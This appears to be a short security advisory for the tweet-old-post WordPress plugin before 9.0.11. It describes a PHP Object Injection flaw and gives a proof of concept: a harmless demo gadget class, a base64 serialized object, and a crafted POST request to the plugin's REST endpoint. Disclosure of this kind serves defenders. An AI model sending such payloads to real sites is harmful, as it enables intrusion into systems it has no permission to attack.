The plugin unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.
To simulate a gadget chain, put the following code in a plugin: class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Use the add account function, intercept it and add or replace the id or pages parameter to Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:“Evil”:0:{};): POST /wp-json/tweet-old-post/v8/api/?req=add_account_fb HTTP/1.1 {“id”:“Tzo0OiJFdmlsIjowOnt9Ow==”,“pages”:[“Tzo0OiJFdmlsIjowOnt9Ow==”]}
CPE | Name | Operator | Version |
---|---|---|---|
tweet-old-post | lt | 9.0.11 |